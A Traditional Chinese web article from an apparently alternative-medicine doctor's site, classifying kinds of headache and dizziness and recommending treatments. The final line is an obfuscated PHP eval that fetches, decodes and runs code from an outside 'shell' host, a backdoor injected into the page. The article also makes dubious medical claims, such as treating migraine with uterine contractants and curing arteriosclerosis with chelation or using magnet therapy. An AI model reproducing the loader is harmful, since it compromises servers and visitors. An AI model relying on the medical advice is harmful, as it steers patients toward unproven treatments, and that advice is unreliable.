收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 別忽視頭痛和暈眩
別忽視頭痛和暈眩 列印 E-mail
        許多台灣人都有「習慣性頭痛」的毛病,或脹痛、或抽痛、或合併暈眩……,求助於主流醫學各科門診,往往都是開立止痛藥了事;再加上「普拿疼」大力廣告促銷,從未明白告知民眾長期大量服用後會造成肝腎損傷的問題,造成民眾產生「我何必上醫院,自己買藥來吃就行了」的心態。

這種「知其然,而不知其所以然」的用藥習慣,對服藥者將會產生很大的影響和副作用。

我藉此個案的機會,將各種「頭痛」及「暈眩」的症狀、原因與治療方式逐一介紹,希望能釐清並改善民眾對「頭痛」及「暈眩」的不正確認知,與危險的用藥觀。

一、抽痛
        其特色是頭部單側或兩側太陽穴抽痛,又稱為偏頭痛,會合併視力模糊與心悸、噁心等症狀,患者的頭不能碰。這種型態的頭痛屬於腦部血管擴張性的疼痛,在女性身上,多是合併子宮收縮不良所導致的疼痛。女性有此種頭部抽痛者,經常也會有經痛、月經量過多或過少、經期過長、經血排不乾淨或血塊大的問題,此種型態的頭痛應以子宮收縮劑來治療。

二、暈痛
        暈痛的特色,是患者會合併有兩肩及後頸部僵硬感,這種型態的頭痛係屬於曾經有過頭部外傷(如車禍或碰撞)的後遺症,或出生時在產道時間過長,腦部輕度受損,導致腦部局部異常放電所造成的頭痛。臨床治療應使用低劑量的抗癲癇藥物,即可明顯改善不適之的症狀。

三、漲痛

        此種型態的頭痛相當常見,在中醫的看法是屬於體液在全身分佈不均所造成的頭痛,主要因為體液大都集中在上半身,故患者經常有合併「眼皮浮腫」的症狀,以及好像是「地震般的頭暈」。

「地震般的頭暈」特色如下:

• 偶爾發生。

• 發生時會感到晃一下。

• 晃過後,感覺即恢復正常。

此類型的頭痛發作時,以手按壓頭部的疼痛部位,會有舒緩頭痛的效果。由於此種頭痛是因體液集中在人體上半身的原因,所以最有效的中藥代表方為「苓桂朮甘湯」。若合併有清鼻水,則使用中藥的代表方為「小青龍湯」,兩者均可代謝出身體上半身多餘的水分,可舒緩此種漲痛感及暈眩。

四、前額的悶痛

        此種型態的頭痛多合併鼻塞、鼻蓄膿,係因鼻竇炎所引起。此時應使用抗組織胺或加上抗生素,以緩解因鼻塞、鼻蓄膿等鼻竇炎所導致的前額悶痛。

五、急性上呼吸道感染所造成的頭痛
        此種型態的頭痛大都會合併有發燒的症狀,此種頭痛係以止痛劑NSAD(Non-Steroid Anti Inflammatory Drug,非類固醇類抗發炎藥 )來治療。

六、眩

        在西醫大致可分為兩種,一種為Dizziness(暈) 另一種為Vertigo(眩),「暈是頭昏、頭重重與昏昏沉沉的感覺」,「眩是一種天旋地轉的暈」;「眩」在中醫認為多因肝氣不足所造成,而西醫則認為是美尼爾症候群、前庭迷路炎或因為中耳、內耳不平衡所造成。

因此西醫使用抑制前庭器的興奮劑來治療「眩」的問題,中醫則以養肝氣的藥物或針灸(針「陽陵泉」穴)來解決人們「眩」的問題。而針「陽陵泉」穴有奇效,屢試不爽!若無針灸經驗的醫生或怕針感疼痛的患者,可使用「磁療」代替「針」。

七、暈
        Dizziness(暈)則多因腦部血流量不足所引起,主因為腦動脈硬化症,使用擴張腦血管的藥物即可改善,但使用「螯合療法」改善腦動脈硬化才是根本解決之道。「螯合療法」同時可以改善全身動脈硬化的問題,並強化人們心、肝、腎的功能。

八、改變姿態時所引起的暈眩(如由蹲到站)

        此種暈眩有兩種可能,一為「貧血」,二為「姿態性低血壓」。貧血可以維他命B12、葉酸與鐵劑來改善症狀,台灣大多數的人都缺乏B12,而維他命B12可解除疲勞。有些維他命缺乏患者,初期症狀並不明顯,

例如甲狀腺的機能健全時,維他命B12的吸收才能順利進行,B12缺乏症的顯現,要在體內蓄積的B12全部被用完後開始算起五年後才會顯現出來。多攝取身體需要的維他命,不僅可以維持身體健康,更可抗老化。

「姿態性低血壓」多為患者本身體質或使用降血壓藥物不正確所導致,必須找心臟科醫生或神經內科醫生商討改變處方,才能改善症狀。

九、如地震的暈
        這是一種最為常見、而西醫卻不知道怎麼醫的疾病,因為在西醫的教科書上幾乎沒有提及此類型的疾病,但在我國臨床上,卻經常碰到這類型的求診者,甚而有人因為這種疾病去掛急診。

中醫理論認為,這種暈多為腎氣不足所造成,體液分佈在上半身,是淤滯的水與氣的上衝,此時以中藥將上半身的氣與水代謝掉,即可改善此種疾病。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));